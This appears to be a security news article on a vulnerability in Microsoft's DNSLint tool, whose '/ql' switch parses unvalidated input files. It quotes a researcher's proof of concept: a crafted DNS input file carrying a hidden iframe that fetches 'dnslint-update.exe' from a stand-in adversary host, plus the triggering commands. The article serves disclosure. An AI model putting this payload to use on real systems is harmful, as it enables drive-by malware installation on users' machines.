The Microsoft DNSLint utility works to diagnose Domain Name System (DNS) name lookup issues related to the IP addresses allotted to different web servers being accessed through a browser. It is not included as part of the basic Windows package but can be downloaded from Microsoft’s website for free. A remote access vulnerability graded 7.6 (critical) on the CVSS 3.0 scale was discovered to affect this utility causing forced drive by downloads to take place.
The vulnerability rises out of the fact that DNSLint does not review domain names when parsing DNS test-files as per the “/ql” switch. In the case that an end user manages to use such a file that contains script or binary code as opposed to the typically anticipated domain name information, the system could be put into risk where it becomes easy to institute forced downloads. In the case that this occurs, a hacker could push for the forced download of a malicious file that could download and execute remote commands when accessed through the web browser. The download would save to a local system location and prompt security access and, seeing that the file comes from a known location on the disk drive, a user could be inclined to allow the executable to carry forward. Once the malicious file is granted privilege, it could run any intended code remotely and compromise the user’s security and privacy.
John Page of hyp3rlinx has written out a proof of concept that simulates this vulnerability, explaining that an unintended file could download as per the following when a script or binary reference text-file is used as opposed to the domain name:
dnslint.exe /v /y /d “MALWARE-FILE” /s X.X.X.X /r “myreport”
In the context of the DNSLint utility, the following shows how the vulnerability could be exploited to introduce malware into the system.
1) “dnslint-update.exe” on remote web server root dir.
;This is a sample DNSLint input file
+This DNS server is called: dns1.cp.msft.net
<iframe//src=”http://ADVERSARY-IP/dnslint-update.exe”//style=”width:0;height:0;border:0;border:none;”></iframe>,a,r ;A record
X.X.X.X,ptr,r ;PTR record
test1,cname,r ;CNAME record
test2,mx,r ;MX record
3) dnslint.exe /ql servers.txt
The above code was not modified as outlined by the rights of hyp3rlinx to this content. Disclosing this vulnerability, it does not seem that there is any patch update to resolve this issue as of yet. A CVE code is still to be assigned to this vulnerability and it is to be IDed and written upon by Microsoft in its official security bulletin on the matter.